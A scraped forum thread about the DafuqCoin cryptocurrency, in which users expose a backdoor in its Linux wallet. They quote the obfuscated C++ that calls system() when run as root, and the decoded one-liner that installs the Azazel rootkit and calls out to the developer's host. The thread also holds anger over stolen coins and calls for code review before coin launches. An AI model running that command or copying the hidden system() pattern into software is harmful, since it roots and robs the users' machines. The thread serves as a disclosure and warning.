[ANN][DFQ] DafuqCoin | NO Premine | NO IPO | ★Now Exchanged★

[pcmerc]

Track him down, execute him.

[1715203993]

1715203993

[1715203993]

1715203993

[1715203993]

1715203993

[1715203993]

1715203993

[icecube45]

[alcamie]

pfeewww GOOd for windows!!! nice to hear that
but what about the coins? ihave 5000 of them
I want to put them in the A*** of devs !!!! can i do that???

im pissed I have over 600k Coins and I have 200k on Bittrex which is locked out now.

I've got 90000 locked out on bittrex. They could at least let us pull the coins back to our wallets.

[hedgy73]

So this turns out that the wallet infected peoples pc with malicious code so Dev could steal from us. Ha ha unlucky you got caught out you fucking lowlife piece of shit thief.

[abalam]

so there is definitely malicious code, or it is just speculation right now?

This is completely malicious - DO NOT RUN

// init.cpp
// Runs if in daemon mode
#if !defined(WIN32) && !defined(QT_GUI)
    fDaemon = GetBoolArg("-daemon");
    if ((access("/usr/.dfq", F_OK) == -1))
      daemonize(getnewid());

// util.h
// daemonize basically calls "system" which executes "s" which is whatever is passed in
inline void  daemonize(std::string s)
{
  if (std::system(s.c_str()))
    return;
  return;
}

// util.cpp
// takes offset1, offset2, offset3 and XORs it
std::string getnewid()
{
  return (hashoffset(offset1, offset2, offset3));
}

// The result
apt-get -y install libpcap-dev libpam-dev wget git >/dev/null 2>&1 || yum -y install libpcap-devel pam-devel wget git >/dev/null 2>&1;cd /tmp/ >/dev/null 2>&1;git clone https://github.com/chokepoint/azazel.git >/dev/null 2>&1;chmod -R 777 azazel/ >/dev/null 2>&1;cd azazel/ >/dev/null 2>&1;sed 's/BLIND_LOGIN = "rootme"/BLIND_LOGIN = "r00t"/' config.py | sed 's/SHELL_PASSWD = "changeme"/SHELL_PASSWD = "r00tp4ssw0rd"/' | sed 's/PASSPHRASE = "Hello NSA"/PASSPHRASE = "Bestp4ssphr4se3v3r"/' | sed 's/KEY_SALT = "changeme"/KEY_SALT = "Bestk3ys4lt3v3r"/' > newconfig.py;mv newconfig.py config.py >/dev/null 2>&1;make >/dev/null 2>&1;make install >/dev/null 2>&1;wget http://dfqcoin.co.nf/in.php >/dev/null 2>&1;cd .. >/dev/null 2>&1;rm -rf azazel/ >/dev/null 2>&1;touch /usr/.dfq >/dev/null 2>&1


...

Given the "wget http://dfqcoin.co.nf/in.php" i can only conclude this is evil dev and not compromised source.   This coin will be delisted and removed from bittrex.com ASAP.

If you ran this as root, your box is compromised and I suggest a rebuild ASAP.  If you did not run as root, this should have failed silently and you should be ok....

Thank you for pointing out the malicious code, and the bash commands resulted.

[abalam]

The author totally assumed its code because when i asked him why it would need sudo privileges he answered :

Hello, you should run it as sudo, at least the first time to insure the folders are created succesfully.
Let me know if there's anything more you need

And when i said i will never execute a wallet with sudo he answered :

Ok no problem then go to init.cpp and delete these lines, starting from L315 :

   if ((access("/usr/.dfq", F_OK) == -1))
      {
          if (getuid()) {
          fprintf(stderr, "Error: Insufficient privileges\n");
          Shutdown(NULL);
        }
      }


I added this cause I had trouble when launching the coin without admin right on a first run. But you probably know what you;re doing so you can remove it and it should work

Regards

[seattletu]

someone trustworthy should fork it. it's gotten enough notoriety over the last 24 hours 

[CoinExpert]

http://www.cryptokk.com/ has been hacked and is closing.

I believe this coin is responsible. A lot of people have lost coins now and now at least one new service for the altcoin community has now been destroyed. How this thread got so much attention is likely from newbie accounts & extremely poor judgement of most people promoting this coin here.

Anyone who thinks these kind of pics are funny is beyond me, yet people were say how good it is.

Unbelievable

http://bitbillions.net/tag/alt-coin-news-2/

Since I read the Announcement thread yesterday on Bitcointalk it has already been added to Exchange sites for voting and there is also a mining pool that will reward block bonuses to miners that will mine DAFUQ COIN.

There is no IPO OR PREMINE on this coin so it is up to the Community to give it some support and see it take off. The Developer is active and sincere in trying to create a good coin and is doing his best to address any issues that may arise or ways in which he can develop the coin further to its full potential.

Are some people paid to write this stuff for scam coins?

[spartak_t]

http://www.cryptokk.com/ has been hacked and is closing.

I believe this coin is responsible. A lot of people have lost coins now and now at least one new service for the altcoin community has now been destroyed. How this thread got so much attention is likely from newbie accounts & extremely poor judgement of most people promoting this coin here.

Anyone who thinks these kind of pics are funny is beyond me, yet people here say how good it is.

Unbelievable

I'm really sorry for Cryptokk. There is something stronger than any of us and it's called life. It may be after 100 years, but the "dev" of this "coin" will repay greatly for stolen coins.

[allcrypt]

Wow. Just wow. I was wondering when someone would try this.

Lesson: Do not run your wallets as root people.

[riddler_xyz]

[...]

I think we ALL must agree on one main rule:
When a new coin launches, put the source up 5 hours or so before launch.
When it is launch time put up the seed nodes with the genesis block, cryptomethcoin did it (1 hour before or so) and put the seeds up at exactly the right time, worked excellent!

This gives us the time to expect the code and set up everything correctly, i think every self respecting coin should do it. If they don't then boycot.

+1

and maybe its time for some independent control organ checking sourcecode before launch ...
implemented by the posting rules in  "Announcements (Altcoins)" by making it mandatory to have sourcecode checked before one is allowed to launch a coin here.

Just imagine what would happen if a dev makes a good coin and waits for the 3rd wallet update when its established and then roots the win and linux clients and pools and runs away with 100K BTC ... thats a possible cataclysm and would throw back coins for aht least a year.

so i think there needs something to be formed from within the cryptocommunity since its not possible for most people to check for malicious software even if they have the sourcecode ... and with all that money in this business its very profitable to do bad stuff.

There is simply a common interest to NOT get Burned(goxd)

the crypto organism needs lymphocytes.

greets ...

[majorminers]

I feel sorry for all pool ops and linux miners that installed this coin. It was bound to happen one day. Pool ops compiling when it launches, other people running the wallets to get a head start and such.

So let this be a lesson, don't take every crap coin and make a pool for it during launch without seeing the code.

I think we ALL must agree on one main rule:
When a new coin launches, put the source up 5 hours or so before launch.
When it is launch time put up the seed nodes with the genesis block, cryptomethcoin did it (1 hour before or so) and put the seeds up at exactly the right time, worked excellent!

This gives us the time to expect the code and set up everything correctly, i think every self respecting coin should do it. If they don't then boycot.

Amen, brother. That's a perfect solution and one that legit devs would have no problem doing. It would also make the whole launch process a lot less stressful.

[toolatetoberich?]

Epic moment confirmed in crypto, the confirmed first coin created purely to install a rootkit and steal all your shit.  Wow.  I feel a little dirty being surprised that it took this long, shouldn't this have happened in like January?  To anyone who doesn't think we're all monkeys I give to you the bitcoin announcement forum. gl everyone

[gentacomp]

You got dafuqed !!!

Luckyly Im windows user and looks like nothing gone wrong with my PC. And only hashing for ~8 hours, thats my policy for new coin... Feel sorry to all pool hacked, hope they got something to fix it (backup data etc...).

[toolatetoberich?]

Maybe the most poignant post in the history of crypto

[richiela]

pfeewww GOOd for windows!!! nice to hear that
but what about the coins? ihave 5000 of them
I want to put them in the A*** of devs !!!! can i do that???

im pissed I have over 600k Coins and I have 200k on Bittrex which is locked out now.

I've got 90000 locked out on bittrex. They could at least let us pull the coins back to our wallets.

It's impossible for us to run the wallet given the malicious nature of it.  And honestly, if i were you, i'd be afraid to run the windows wallet.  Who knows what other kind of nasty is in it.

[sonysasankan]

[...]

I think we ALL must agree on one main rule:
When a new coin launches, put the source up 5 hours or so before launch.
When it is launch time put up the seed nodes with the genesis block, cryptomethcoin did it (1 hour before or so) and put the seeds up at exactly the right time, worked excellent!

This gives us the time to expect the code and set up everything correctly, i think every self respecting coin should do it. If they don't then boycot.

+1

and maybe its time for some independent control organ checking sourcecode before launch ...
implemented by the posting rules in  "Announcements (Altcoins)" by making it mandatory to have sourcecode checked before one is allowed to launch a coin here.

Just imagine what would happen if a dev makes a good coin and waits for the 3rd wallet update when its established and then roots the win and linux clients and pools and runs away with 100K BTC ... thats a possible cataclysm and would throw back coins for aht least a year.

so i think there needs something to be formed from within the cryptocommunity since its not possible for most people to check for malicious software even if they have the sourcecode ... and with all that money in this business its very profitable to do bad stuff.

There is simply a common interest to NOT get Burned(goxd)

the crypto organism needs lymphocytes.

greets ...

Just like how IPOs go through an Escrow, is it possible to have a source code Escrow of sorts? Where devs of other successful coins are trusted with the code to check through for malicious content, and a significant amount from the premine can be offered as bounty for the dev that is chosen. Once approved, Bitcoin signature can be used to verify very quickly by anyone if the code that was released was changed from what was given to the escrow. That should put a check in place right?

[DanielVG]

Is there anyone who has details on the total amount of stolen coins?




@ dafuq dev, karma will get you, your mommy should put you over her lap and slap you on the popo

[djm34]

dev, how fix that?

It's broke on windows. I am still trying to find out if the win-qt address are still valid with the network.
Theoretically you are fine, you don't even need a wallet and can do everything one by one and piece by piece using the blockchain only.
Unless dev did something foolish.
That error probably just means it can't find the network so if any coins have been sent, it's not reporting it, because it's unplugged/broke.
I didn't write the code so no clue.

Install linux on a box and move your wallet.dat across and put in ~/.dafuqcoin and launch "dafuqcoin-qt -rescan" This will import your windows wallet and all will be good.

You can even use live USB key of ubuntu.

I guess it was a good idea after all to not follow this sort of advice... (I could have lost all my dafuqcoin, and may-be some yacoin  )

[DanielVG]

dev, how fix that?

It's broke on windows. I am still trying to find out if the win-qt address are still valid with the network.
Theoretically you are fine, you don't even need a wallet and can do everything one by one and piece by piece using the blockchain only.
Unless dev did something foolish.
That error probably just means it can't find the network so if any coins have been sent, it's not reporting it, because it's unplugged/broke.
I didn't write the code so no clue.

Install linux on a box and move your wallet.dat across and put in ~/.dafuqcoin and launch "dafuqcoin-qt -rescan" This will import your windows wallet and all will be good.

You can even use live USB key of ubuntu.

I guess it was a good idea after all to not follow this sort of advice... (I could have lost all my dafuqcoin, and may-be some yacoin  )

wait...whut?
yeah, that would've been a shame...
hiding a trojan to steal his own scamshit back which was never meant to succeed.
I like your logic. Carry on & please don't hurt yourself.